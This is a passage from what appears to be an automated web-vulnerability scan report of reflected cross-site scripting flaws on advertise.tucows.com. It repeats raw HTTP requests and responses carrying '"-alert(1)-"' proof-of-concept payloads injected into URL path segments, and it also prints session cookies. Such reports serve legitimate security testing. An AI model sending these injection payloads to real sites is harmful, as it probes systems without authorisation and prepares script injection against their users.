GET /includes/js5ac19"-alert(1)-"1250877226f/show_layer.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:24 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js5ac19"-alert(1)-"1250877226f/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.18. http://advertise.tucows.com/includes/js/show_layer.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 835b0"-alert(1)-"17c882840e0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/show_layer.js835b0"-alert(1)-"17c882840e0 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:38 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/show_layer.js835b0"-alert(1)-"17c882840e0";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.19. http://advertise.tucows.com/includes/js/signupin.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 624a4"-alert(1)-"3358fadd2b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes624a4"-alert(1)-"3358fadd2b6/js/signupin.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:21 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes624a4"-alert(1)-"3358fadd2b6/js/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.20. http://advertise.tucows.com/includes/js/signupin.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b36c3"-alert(1)-"b205bb5d532 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/jsb36c3"-alert(1)-"b205bb5d532/signupin.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:27 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/jsb36c3"-alert(1)-"b205bb5d532/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.21. http://advertise.tucows.com/includes/js/signupin.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28622"-alert(1)-"2ff515b5d95 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/signupin.js28622"-alert(1)-"2ff515b5d95 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:48 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/signupin.js28622"-alert(1)-"2ff515b5d95";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.22. http://advertise.tucows.com/includes/js/x_core.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42de8"-alert(1)-"7d8ee46561 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes42de8"-alert(1)-"7d8ee46561/js/x_core.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:19 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes42de8"-alert(1)-"7d8ee46561/js/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.23. http://advertise.tucows.com/includes/js/x_core.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b15de"-alert(1)-"e0f1f5c84c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/jsb15de"-alert(1)-"e0f1f5c84c9/x_core.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:24 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/jsb15de"-alert(1)-"e0f1f5c84c9/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.24. http://advertise.tucows.com/includes/js/x_core.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd486"-alert(1)-"0da40994d37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/x_core.jscd486"-alert(1)-"0da40994d37 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:36 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/x_core.jscd486"-alert(1)-"0da40994d37";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.25. http://advertise.tucows.com/includes/js/xdocsize.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fa22"-alert(1)-"0e7110e52dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes1fa22"-alert(1)-"0e7110e52dc/js/xdocsize.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:17 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes1fa22"-alert(1)-"0e7110e52dc/js/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.26. http://advertise.tucows.com/includes/js/xdocsize.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c95d"-alert(1)-"1272630c525 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js9c95d"-alert(1)-"1272630c525/xdocsize.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:23 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
